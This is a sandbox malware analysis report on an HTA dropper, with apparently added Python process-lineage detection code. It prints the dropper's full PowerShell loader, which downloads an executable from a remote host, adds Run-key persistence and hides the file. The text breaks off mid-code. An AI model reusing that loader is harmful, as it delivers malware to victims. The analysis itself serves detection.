General Info

File name

MSHTAPayloadawalobina.hta

Full analysis
https://app.any.run/tasks/3ded9aa6-72fb-42bb-9dcb-6313dc3359fa
Verdict
Malicious activity
Analysis date
1/10/2019, 20:41:59
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

autoit

Indicators:

MIME:
text/html
File info:
HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5

966ab78b142d9aaed55e86e26ad73887

SHA1

4453f3838ce737f8e7b62545a1a970f21c4a397e

SHA256

3486a83f7060f11655b744238de048e7d9f6e9f41e73fc0635cef356db12be31

SSDEEP

96:wBvaY1zUMd6VfRjF/Vaqk8k236yOXOuJWksRRzMo:wb1zUrbfaIk+pU6xRRzP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is for user acknowledgement. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evasion option
on
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Severity tabs: MALICIOUS / SUSPICIOUS / INFO
Application was dropped or rewritten from another process
  • lwh.exe (PID: 3768)
  • WfFyPbj.exe (PID: 2632)
  • lwh.exe (PID: 2736)
Changes the autorun value in the registry
  • powershell.exe (PID: 3716)
  • lwh.exe (PID: 2736)
Uses ATTRIB.EXE to modify file attributes
  • powershell.exe (PID: 3716)
Executes PowerShell scripts
  • iexplore.exe (PID: 3440)
Creates files in the user directory
  • powershell.exe (PID: 3716)
Drop AutoIt3 executable file
  • WfFyPbj.exe (PID: 2632)
Application launched itself
  • lwh.exe (PID: 3768)
Executable content was dropped or overwritten
  • WfFyPbj.exe (PID: 2632)
  • powershell.exe (PID: 3716)
Connects to unusual port
  • RegSvcs.exe (PID: 1144)
Changes internet zones settings
  • iexplore.exe (PID: 3000)
Reads Internet Cache Settings
  • iexplore.exe (PID: 3440)
Reads internet explorer settings
  • iexplore.exe (PID: 3440)
Dropped object may contain Bitcoin addresses
  • lwh.exe (PID: 3768)
  • WfFyPbj.exe (PID: 2632)
Application launched itself
  • iexplore.exe (PID: 3000)
Creates files in the user directory
  • iexplore.exe (PID: 3000)

Find more information about signature artifacts and the mapping to the MITRE ATT&CK™ matrix in the full report.

Static information

TRiD
.html | HyperText Markup Language (100%)
EXIF
HTML
ContentType:
text/html; charset=utf-8

Processes

Total processes
41
Monitored processes
9
Malicious processes
5
Suspicious processes
1

Behavior graph

Process tree (the interactive graph flattened to text; parent links are taken from the per-process entries below, "no specs" marks a process that carries no indicators, "start" / "drop and start" are the graph's edge labels):

iexplore.exe (PID 3000)                                  -- start: opens MSHTAPayloadawalobina.hta.html
└─ iexplore.exe (PID 3440)  no specs                      -- content process; loads vbscript.dll, wshom.ocx, scrrun.dll
   ├─ powershell.exe (PID 3716)                           -- download cradle, HKCU Run-key persistence
   │  ├─ WfFyPbj.exe (PID 2632)                           -- drop and start
   │  │  └─ lwh.exe (PID 3768)  no specs                  -- drop and start; AutoIt v3 interpreter
   │  │     └─ lwh.exe (PID 2736)                         -- relaunches itself with VTOCI as argument
   │  │        └─ RegSvcs.exe (PID 1144)                  -- connects to unusual port
   │  └─ attrib.exe (PID 3132)  no specs                  -- +h +s on WfFyPbj.exe
DllHost.exe (PID 2984, hosts PhotoViewer.dll)  no specs   -- parent not recorded; COM surrogate for Windows Photo Viewer
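The lineage rules one would derive from this tree, as an added example (my code, not ANY.RUN's and not part of the report). Looked at in isolation, most of these processes are unremarkable: a signed Microsoft binary (RegSvcs.exe) started with no arguments, an Internet Explorer process, attrib.exe. Only the parent-child relationships make them suspicious, which is why the rules below always take the parent into account. One further observation from the report: regsvcs.exe appears in the module list of lwh.exe (PID 2736) before RegSvcs.exe (PID 1144) is started, so the AutoIt process mapped the .NET utility's image itself; that is the pattern worth checking when you suspect the child is a hollowed host, although the report does not flag injection. EVENTS is constructed from the Process information entries below (parent PIDs resolved from the parent-name fields and the graph order); the rule names, the path markers and the binary lists are my own assumptions.

```python
"""Process-lineage rules over the process entries of this report.

Added example, not ANY.RUN code. EVENTS is constructed from the PID / parent / CMD /
description fields of the Process information section; rule names and lists are assumptions.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: Optional[int]  # None where the report records no parent
    image: str
    cmdline: str
    description: str


EVENTS = [
    Proc(3000, None, "iexplore.exe",
         r'"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\MSHTAPayloadawalobina.hta.html',
         "Internet Explorer"),
    Proc(3440, 3000, "iexplore.exe", r'"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3000 CREDAT:79873',
         "Internet Explorer"),
    Proc(3716, 3440, "powershell.exe",  # script body left out of this sample
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo',
         "Windows PowerShell"),
    Proc(2984, None, "DllHost.exe", r"C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}",
         "COM Surrogate"),
    Proc(2632, 3716, "WfFyPbj.exe", r'"C:\Users\admin\AppData\Roaming\WfFyPbj.exe"', ""),
    Proc(3132, 3716, "attrib.exe", r'"C:\Windows\system32\attrib.exe" +h +s C:\Users\admin\AppData\Roaming\WfFyPbj.exe',
         "Attribute Utility"),
    Proc(3768, 2632, "lwh.exe", r'"C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe" fld=ktl', "AutoIt v3 Script"),
    Proc(2736, 3768, "lwh.exe", r"C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe C:\Users\admin\AppData\Local\Temp\88465914\VTOCI",
         "AutoIt v3 Script"),
    Proc(1144, 2736, "RegSvcs.exe", r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"',
         "Microsoft .NET Services Installation Utility"),
]

# Assumed lists: parents that should not be spawning script hosts, script hosts, .NET utilities
# commonly used as injection targets, and path fragments that mark user-writable locations.
DOCUMENT_HANDLERS = {"iexplore.exe", "mshta.exe", "winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "firefox.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
DOTNET_UTILITIES = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def split_cmdline(cmdline: str):
    """Return (image path, argument string); the image path may be quoted."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.index('"', 1)
        return s[1:end], s[end + 1:].strip()
    image, _, rest = s.partition(" ")
    return image, rest.strip()


def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def rules(proc: Proc, parent: Optional[Proc]) -> List[str]:
    """Rules that need the parent as well as the child; the names are my own labels."""
    hits = []
    name = proc.image.lower()
    pname = parent.image.lower() if parent else ""
    path, args = split_cmdline(proc.cmdline)
    if pname in DOCUMENT_HANDLERS and name in SCRIPT_HOSTS:
        hits.append("script_host_from_document_handler")
    if pname in SCRIPT_HOSTS and in_user_writable(path):
        hits.append("script_host_runs_exe_from_user_writable_dir")
    if name == "attrib.exe" and "+h" in args and "+s" in args:
        hits.append("attrib_hides_file")
    if parent and name == pname and in_user_writable(path):
        hits.append("relaunches_itself_from_user_writable_dir")
    if parent and "autoit" in parent.description.lower() and name in DOTNET_UTILITIES and not args:
        hits.append("autoit_parent_starts_dotnet_utility_without_args")
    return hits


def evaluate(events: List[Proc]) -> Dict[int, List[str]]:
    """Map each PID that fires at least one rule to the list of rule names."""
    by_pid = {p.pid: p for p in events}
    return {p.pid: h for p in events if (h := rules(p, by_pid.get(p.ppid)))}


def lineage(events: List[Proc], pid: int) -> str:
    """Root-to-leaf chain such as 'iexplore.exe(3000) > ... > RegSvcs.exe(1144)'."""
    by_pid = {p.pid: p for p in events}
    chain, seen, p = [], set(), by_pid.get(pid)
    while p and p.pid not in seen:
        seen.add(p.pid)
        chain.append(f"{p.image}({p.pid})")
        p = by_pid.get(p.ppid)
    return " > ".join(reversed(chain))


if __name__ == "__main__":
    for pid, hits in evaluate(EVENTS).items():
        print(f"{pid}: {', '.join(hits)}\n    {lineage(EVENTS, pid)}")
```

Run against the constructed events it flags five of the nine processes, and the chain printed for PID 1144 is the full path from the browser to the .NET utility. The same rules run unchanged over Sysmon event 1 or Windows 4688 records once they are mapped into Proc, which is the point: every rule here is a statement about two adjacent processes, not about one image name.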

Process information


PID
3000
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\MSHTAPayloadawalobina.hta.html
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\cryptbase.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\ieui.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\url.dll
c:\windows\system32\version.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\msfeeds.dll
c:\windows\system32\sxs.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\userenv.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\naturallanguage6.dll
c:\windows\system32\nlsdata0009.dll
c:\windows\system32\nlslexicons0009.dll
c:\windows\system32\tquery.dll
c:\windows\system32\structuredquery.dll
c:\windows\system32\secur32.dll
c:\windows\system32\wpc.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\netutils.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll

PID
3440
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3000 CREDAT:79873
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
No indicators
Parent process
iexplore.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rsaenh.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\mlang.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\apphelp.dll
c:\program files\java\jre1.8.0_92\bin\ssv.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\version.dll
c:\progra~1\micros~1\office14\urlredir.dll
c:\windows\system32\secur32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\progra~1\micros~1\office14\msohev.dll
c:\program files\java\jre1.8.0_92\bin\jp2ssv.dll
c:\program files\java\jre1.8.0_92\bin\msvcr100.dll
c:\program files\java\jre1.8.0_92\bin\deploy.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\sxs.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\msls31.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winmm.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\wdmaud.drv
c:\windows\system32\ksuser.dll
c:\windows\system32\avrt.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\audioses.dll
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\msacm32.drv
c:\windows\system32\msacm32.dll
c:\windows\system32\midimap.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\wintrust.dll

PID
3716
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo $osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";$poshVersion = $PSVersionTable.PSVersion.Major;if($poshVersion -eq 2){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($decoyURL, $decoyPath);Start-Process $decoyPath;Start-Sleep -s 7;New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;$peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($peDirectURL, $savePath)}elseif($poshVersion -ge 3){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";Invoke-WebRequest -Uri $decoyURL -OutFile $decoyPath;Start-Process $decoyPath;Start-Sleep -s 7;New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;$peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';Invoke-WebRequest -Uri $peDirectURL -OutFile $savePath};Start-Process $savePath;attrib +h +s $savePath;""
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\program files\windows photo viewer\photoviewer.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\d3d9.dll
c:\windows\system32\d3d8thk.dll
c:\windows\system32\windowscodecs.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\oleacc.dll
c:\program files\windows photo viewer\photobase.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\roaming\wffypbj.exe
c:\windows\system32\attrib.exe
c:\windows\system32\netutils.dll
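Triage of the PID 3716 command line, as an added example (my code, not ANY.RUN's and not the malware author's). Two points from the report are worth keeping in mind while reading it. First, the sample was submitted as an .hta but the sandbox opened it as MSHTAPayloadawalobina.hta.html in iexplore.exe (PID 3000), so the script ran inside the IE content process (PID 3440, which loads vbscript.dll, wshom.ocx and scrrun.dll) and powershell.exe's parent is iexplore.exe rather than mshta.exe; a rule that keys only on mshta.exe as the parent of PowerShell would miss this run. Second, the script branches on $PSVersionTable.PSVersion.Major and uses System.Net.WebClient.DownloadFile on PowerShell 2 but Invoke-WebRequest on 3 and later, so a cradle signature has to cover both. The script body embedded below is the PowerShell 3+ branch copied from the CMD field; the quote-aware statement splitter, the rule names and the scoring threshold are my own assumptions.

```python
"""Split a captured PowerShell one-liner into statements and flag loader behaviours.

Added example for this report (not ANY.RUN code). Rule names and the threshold are assumptions.
"""
import re

# Host flags exactly as recorded in the CMD field of powershell.exe (PID 3716).
SAMPLE_HOST = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
               r'-ExecutionPolicy bypass -WindowStyle hidden -nologo ')

# Script body: the PowerShell 3+ branch of the recorded command line, copied verbatim. The
# PowerShell 2 branch is the same with System.Net.WebClient.DownloadFile in place of Invoke-WebRequest.
SAMPLE_SCRIPT = (
    r"""$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});"""
    r"""$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';"""
    r"""$decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";"""
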